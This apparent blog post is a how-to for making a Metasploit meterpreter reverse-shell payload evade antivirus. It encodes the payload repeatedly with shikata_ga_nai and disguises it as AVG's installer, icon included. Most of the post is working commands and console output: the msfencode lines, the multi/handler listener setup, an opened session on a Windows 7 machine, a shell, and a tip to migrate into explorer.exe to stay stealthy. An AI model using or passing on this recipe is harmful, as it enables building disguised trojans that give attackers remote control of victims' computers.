Msfencode to bypass anti-virus

My little research has determined 2 worthy anti-virus solutions to determine or protect you against Metasploit payloads etc. This research has determined that Sophos and Microsoft Security Essentials are the only worthy engines for this type of attack. On some of the uploads to VirusTotal, DrWeb also found the file to be bad.

So here is what I typed in my Ubuntu system.  You have to have Metasploit installed.

windows/meterpreter/reverse_tcp LHOST= LPORT=9090 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -o bad.exe

bad.exe shows 20 Anti-Virus Engines that have detected the bad file. Well that is great right, well.......this next command will show how most of those engines will not recognize it.

In this command we are using the -x switch to take the characteristics of a valid exe and encode the new file 10 times withh shikata_ga_nai. So lets just grab avg's installer file.

windows/meterpreter/reverse_tcp LHOST= LPORT=9090 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o avg.exe


The next screenshot shows how the avg.exe takes the characteristics even the icon of avg's install program.

 Now on my Ubuntu machine I run the following

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 9090
lport => 9090
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler on port 9090
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter >

On the windows 7 machine I run avg.exe.  You can see from the above that it connected.  I issue a sysinfo and see it the windows 7 machine.

meterpreter > sysinfo
Computer: KELLYO-PC
OS      : Windows 7 (Build 7600, ).
Arch    : x64 (Current Process is WOW64)
Language: en_US

I type shell and now can manuever throughout the system

meterpreter > shell
Process 1984 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


I exit out and return to meterpreter. 

running ps will give you a list of processes.  To stay stealthy run

meterpreter> migrate run explorer.exe

Hope you enjoyed.  I may append more to this blog.



bad.png57.61 KB
avg.png43.85 KB
avg1.png6.09 KB